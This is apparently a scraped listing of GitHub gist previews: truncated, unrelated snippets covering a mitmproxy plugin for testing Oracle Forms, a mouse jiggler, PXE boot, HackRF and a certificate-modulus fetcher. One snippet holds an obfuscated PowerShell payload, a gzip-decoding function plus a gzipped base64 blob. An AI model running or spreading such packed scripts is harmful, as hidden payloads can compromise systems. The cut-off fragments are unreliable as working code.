Clone plugin from
https://github.com/silentsignal/oracle_forms/
Edit script for Python 3 (see pull request)
if ctx.options.corrupt_handshake:
flow.response.content = flow.response.content.replace(b'Mate', b'Matf')
| $Flickering = "ZnVuY3Rpb24gQ29udmVydEZyb20tR3ppcCB7CiAgICBbQ21kbGV0QmluZGluZygpXQogICAgcGFyYW0oW2J5dGVbXV0gJEJ5dGVzKQogICAgJGlzID0gTmV3LU9iamVjdCBJTy5NZW1vcnlTdHJlYW0oLCAkQnl0ZXMpCiAgICAkZ3MgPSBOZXctT2JqZWN0IElPLkNvbXByZXNzaW9uLkd6aXBTdHJlYW0gJGlzLCAoW0lPLkNvbXByZXNzaW9uLkNvbXByZXNzaW9uTW9kZV06OkRlY29tcHJlc3MpCiAgICAkc3IgPSBOZXctT2JqZWN0IElPLlN0cmVhbVJlYWRlcigkZ3MpCiAgICAkc2JkID0gJHNyLlJlYWRUb0VuZCgpCiAgICAkc3IuQ2xvc2UoKQogICAgJGdzLkNsb3NlKCkKICAgICRpcy5DbG9zZSgpCiAgICAkc2JkCn0KCg==" | |
| $Crumbliest = "H4sIAAAAAAAAA80bXW/iSPKdX+EbIdnWGjSTvbsHTpGGJGQm2kyChs3tA7JGDm6SvjU2a7ezw43y36/60/1hAyHktHkA3F1dVV3fXe0s63xBcJF7N+jPwcUmT1Z48aVI6wx5P3o9D/7m56s0Q+QM5ynOH4IwZqPrpExWAfvJgGakhNlYDfQ5kptkhbxTb/6pxmk8GgER+isIh78WfEUQsiUhp7UsSpQsHr2gP64qtLrPNh7OAfmmImg1HK/XF8UqwTlgOq/LEuWEPw8/ISIWYFQFYQi8S0bwUsM2vKyzjPE0SPK0bWI4W2eYBH7kh/P3sTdAf+hbMTDTvxKRusw9hUdNPvf4J/vqK86pLL6iZYaY0IdyWax+0a38ulmjwLc37Yd0bloWa1SSTeAbEuCT/06yGgX9HPYSeR9BDoK6lOUp0/Lt/X+AvDegZJgsBKUWvrioxuVDvQJS17giujRM7Gc1zlJUApFmu8MLtMQ5EnYlIRuxR57/tQbmOSbT/E4d1CY2DhZo |
| #include <DigiMouse.h> | |
| void setup() { | |
| DigiMouse.begin(); | |
| } | |
| #define ONE_SECOND 1000 | |
| #define SLEEP_SECOND ONE_SECOND * 30 | |
| #define JIGGLE_PIXELS 5 |
| # Test for semantic between sentences using small language model | |
| from transformers import AutoTokenizer, AutoModel | |
| import torch | |
| from sklearn.metrics.pairwise import cosine_similarity | |
| # Load a multilingual lightweight model and tokenizer | |
| model_name = "sentence-transformers/paraphrase-multilingual-MiniLM-L12-v2" | |
| tokenizer = AutoTokenizer.from_pretrained(model_name) | |
| model = AutoModel.from_pretrained(model_name) |
| #!/bin/bash | |
| docker create --name extract_test repo.foo.bar/some_image:v1337 | |
| mkdir container | |
| docker export extract_test | tar xvf - -C container |
| #!/bin/bash | |
| # Run PXE boot server on interface | |
| # Seems to work with UEFI and Secureboot | |
| # Spip, 2023 | |
| # | |
| # Most stuff from https://www.youtube.com/watch?v=E_OlsA1hF4k | |
| # | |
| # Check args |
| /* | |
| Simple HackRF programming exercise | |
| Sipke '19 | |
| This program receives raw data from a certain frequency until the user pressed ctrl+c. | |
| Code is mostly taken from hackrf_sweep.c (hackrf toolbox) and converted to the bare minimum. | |
| It's created to learn about how the HackRF behaves and to do something with it via custom code that doesn't involve GnuRadio. | |
| Note that you can directly use the command line tools hackrf_sweep, hackrf_transfer and rtl_sdr for the same thing and more. |
| import ssl | |
| from Crypto.Util import asn1 | |
| from OpenSSL.crypto import FILETYPE_PEM, FILETYPE_ASN1, load_certificate, dump_privatekey | |
| def getModulusFromServer(host, port=443): | |
| try: | |
| # get cert from server | |
| cert = ssl.get_server_certificate((host,port)) | |
| # load certificate |